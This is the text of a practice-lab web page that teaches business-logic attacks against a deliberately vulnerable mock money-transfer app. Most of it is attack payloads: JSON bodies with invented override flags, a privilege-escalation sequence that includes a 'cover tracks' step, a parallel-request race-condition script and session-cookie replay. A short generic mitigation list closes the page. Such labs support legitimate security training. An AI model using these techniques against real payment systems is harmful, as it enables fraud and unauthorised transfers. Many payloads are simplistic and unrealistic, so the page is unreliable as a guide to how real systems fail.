Lab 5: Advanced Business Logic - Business Logic Labs

Difficulty: High

Lab Overview

This lab demonstrates advanced business logic vulnerabilities that combine multiple techniques like complex authorization bypass, multi-step attacks, and sophisticated business rule exploitation.

Objective: Understand how advanced business logic attacks work and how to exploit them.

Vulnerable Transfer System

Money Transfer

This system allows money transfers. Try to exploit advanced business logic:

From User

To User

Amount

Transfer Type

Advanced Bypass Tester

⚠️ Advanced Business Logic Warning

This lab demonstrates advanced business logic vulnerabilities:

Complex Authorization - Multi-layered authorization bypass
Business Rule Exploitation - Exploit business rules
Multi-Step Attacks - Complex attack sequences
State Manipulation - Manipulate application state

Advanced Techniques

These techniques can be used for advanced bypass:

Authorization Bypass - Bypass complex authorization
Business Rule Exploitation - Exploit business rules
Multi-Step Attacks - Complex attack sequences
State Manipulation - Manipulate application state

Users List

Admin User

Admin

Balance: $10,000.00

ID: 1

Regular User

User

Balance: $1,000.00

ID: 2

Premium User

Premium

Balance: $5,000.00

ID: 3

Advanced Business Logic Techniques

Authorization Bypass

// Bypass complex authorization { "from_user": 1, "to_user": 2, "amount": 1000, "transfer_type": "admin", "admin_override": true, "skip_authorization": true }

Business Rule Exploitation

// Exploit business rules { "from_user": 1, "to_user": 2, "amount": 1000, "transfer_type": "instant", "fee_waiver": true, "limit_override": true }

Multi-Step Attacks

// Complex attack sequence // Step 1: Escalate privileges // Step 2: Bypass limits // Step 3: Execute transfer // Step 4: Cover tracks

State Manipulation

// Manipulate application state { "from_user": 1, "to_user": 2, "amount": 1000, "user_role": "admin", "balance_override": true }

Parameter Pollution

// Parameter pollution { "from_user": 1, "to_user": 2, "amount": 1000, "from_user": 2, // Override "amount": 0.01 // Override }

Logic Bomb

// Logic bomb { "from_user": 1, "to_user": 2, "amount": 1000, "condition": "if admin then amount = 0", "admin_check": false }

Vulnerability Details

Type: Advanced Business Logic
Severity: Critical
Method: Multiple techniques
Issue: Complex vulnerabilities

Attack Vectors

Authorization Bypass: Bypass complex authorization
Business Rule Exploitation: Exploit business rules
Multi-Step Attacks: Complex attack sequences
State Manipulation: Manipulate application state

Advanced Business Logic Examples

Use these techniques to exploit advanced business logic vulnerabilities:

1. Authorization Bypass:

// Bypass complex authorization
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "transfer_type": "admin",
  "admin_override": true,
  "skip_authorization": true,
  "user_role": "admin",
  "permissions": ["transfer", "admin", "override"]
}

2. Business Rule Exploitation:

// Exploit business rules
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "transfer_type": "instant",
  "fee_waiver": true,
  "limit_override": true,
  "business_rule_bypass": true,
  "validation_skip": true
}

3. Multi-Step Attack:

// Step 1: Escalate privileges
POST /escalate_privileges
{
  "user_id": 1,
  "target_role": "admin",
  "escalation_reason": "emergency"
}

// Step 2: Bypass limits
POST /bypass_limits
{
  "user_id": 1,
  "limit_type": "transfer",
  "new_limit": 999999
}

// Step 3: Execute transfer
POST /transfer
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "admin_override": true
}

4. State Manipulation:

// Manipulate application state
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "user_role": "admin",
  "balance_override": true,
  "state_manipulation": true,
  "session_hijack": true
}

5. Parameter Pollution:

// Parameter pollution
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "from_user": 2,  // Override
  "amount": 0.01,  // Override
  "transfer_type": "admin",
  "admin_override": true
}

6. Logic Bomb:

// Logic bomb
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "condition": "if admin then amount = 0",
  "admin_check": false,
  "logic_bomb": true,
  "exploit_condition": true
}

7. Race Condition Exploitation:

// Exploit race conditions
const promises = [];
for (let i = 0; i < 10; i++) {
    promises.push(
        fetch('/transfer', {
            method: 'POST',
            body: JSON.stringify({
                from_user: 1,
                to_user: 2,
                amount: 1000,
                admin_override: true
            })
        })
    );
}
Promise.all(promises);

8. Session Hijacking:

// Session hijacking
const adminSession = 'admin_session_token';
fetch('/transfer', {
    method: 'POST',
    headers: {'Cookie': `session_id=${adminSession}`},
    body: JSON.stringify({
        from_user: 1,
        to_user: 2,
        amount: 1000
    })
});

9. API Endpoint Manipulation:

// Manipulate API endpoints
// Use different endpoints
fetch('/admin/transfer', {method: 'POST', body: 'amount=1000'});
fetch('/internal/transfer', {method: 'POST', body: 'amount=1000'});
fetch('/bypass/transfer', {method: 'POST', body: 'amount=1000'});

10. Business Logic Bypass:

// Bypass business logic
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "business_logic_override": true,
  "validation_skip": true,
  "rule_bypass": true,
  "admin_override": true
}

11. Complex Authorization Bypass:

// Complex authorization bypass
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "authorization": {
    "level": "admin",
    "permissions": ["transfer", "admin", "override"],
    "bypass": true,
    "skip_checks": true
  }
}

12. Business Rule Manipulation:

// Manipulate business rules
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "business_rules": {
    "max_transfer": 999999,
    "fee_waiver": true,
    "limit_override": true,
    "validation_skip": true
  }
}

13. State Machine Bypass:

// Bypass state machine
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "state_machine": {
    "current_state": "completed",
    "target_state": "completed",
    "skip_states": ["pending", "approved"],
    "state_override": true
  }
}

14. Workflow Bypass:

// Bypass workflow
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "workflow": {
    "skip_approval": true,
    "admin_override": true,
    "workflow_bypass": true,
    "direct_execution": true
  }
}

15. Advanced Parameter Manipulation:

// Advanced parameter manipulation
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "parameters": {
    "admin_override": true,
    "skip_validation": true,
    "bypass_limits": true,
    "direct_execution": true,
    "privilege_escalation": true
  }
}

Real-World Attack Scenarios

Sophisticated financial fraud
Complex authorization bypass
Advanced business rule exploitation
Multi-step attack sequences
State manipulation and corruption
Advanced persistent threats
Corporate espionage
Nation-state attacks

Mitigation Strategies

Implement comprehensive business logic validation
Use secure authorization and access controls
Implement proper state management
Use secure coding practices
Regular security testing and vulnerability assessments
Monitor for unusual business logic patterns
Implement proper input validation
Use secure session management
Implement proper error handling
Educate users about security threats
Use multi-factor authentication
Implement proper logging and monitoring
Use business logic verification systems
Implement proper audit trails
Use threat intelligence and monitoring